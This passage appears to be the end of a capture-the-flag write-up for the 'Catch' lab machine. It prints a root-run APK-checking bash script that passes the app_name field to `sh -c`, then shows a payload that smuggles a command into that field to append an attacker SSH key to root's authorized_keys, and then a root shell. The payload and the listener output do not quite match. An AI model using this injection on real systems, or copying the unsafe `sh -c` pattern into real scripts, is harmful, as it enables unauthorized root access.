#!/bin/bash
###################
# Signature Check #
###################
sig_check() {
jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
if [[ $? -eq 0 ]]; then
echo '[+] Signature Check Passed'
else
echo '[!] Signature Check Failed. Invalid Certificate.'
cleanup
exit
fi
}
#######################
# Compatibility Check #
#######################
comp_check() {
apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
if [ -z "$COMPILE_SDK_VER" ]; then
echo '[!] Failed to find target SDK version.'
cleanup
exit
else
if [ $COMPILE_SDK_VER -lt 18 ]; then
echo "[!] APK Doesn't meet the requirements"
cleanup
exit
fi
fi
}
####################
# Basic App Checks #
####################
app_check() {
APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
echo $APP_NAME
if [[ $APP_NAME == *"Catch"* ]]; then
echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
else
echo "[!] App doesn't belong to Catch Global"
cleanup
exit
fi
}
###########
# Cleanup #
###########
cleanup() {
rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
}
###################
# MDM CheckerV1.0 #
###################
DROPBOX=/opt/mdm/apk_bin
IN_FOLDER=/root/mdm/apk_bin
OUT_FOLDER=/root/mdm/certified_apps
PROCESS_BIN=/root/mdm/process_bin
for IN_APK_NAME in $DROPBOX/*.apk;do
OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
APK_NAME="$(openssl rand -hex 12).apk"
if [[ -L "$IN_APK_NAME" ]]; then
exit
else
mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
fi
sig_check $IN_FOLDER $APK_NAME
comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
done
cleanup
After analyzing the script we can see that the script searches for files with the .apk extension in the directory /opt/mdm/apk_bin. If an apk file is found then various checks are performed on the file such as signature, compatibility, and basic check. These checks are performed using the tool apktool. What makes this script very interesting is that it is moved to the /root/ directory and most likely this script is run by the root user.
This script contains various variables, and we can control the APP_NAME variable. So, we can hide a payload in the name of our apk-file. We have to keep in mind that the name Catch must appear in the app_name.
Let’s generate a key pair on our host machine.
1
ssh-keygen -t ed25519 -f id_ed25519
Our payload.
1
2
3
4
<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="app_name">Catch; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJtbOqWeTwruW07yWzQ3qhLvKnFQBn3PRNc9vrDa7bP2 root@kali' >> /root/.ssh/authorized_keys </string>
</resources>
Own Catch.
1
2
3
4
5
6
7
8
listening on [any] 4444 ...
connect to [10.10.14.12] from catch.htb [10.10.11.150] 34642
sh: 0: can't access tty; job control turned off
# hostname; whoami; id
catch
root
uid=0(root) gid=0(root) groups=0(root)
#
Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!
Happy Hacking :-)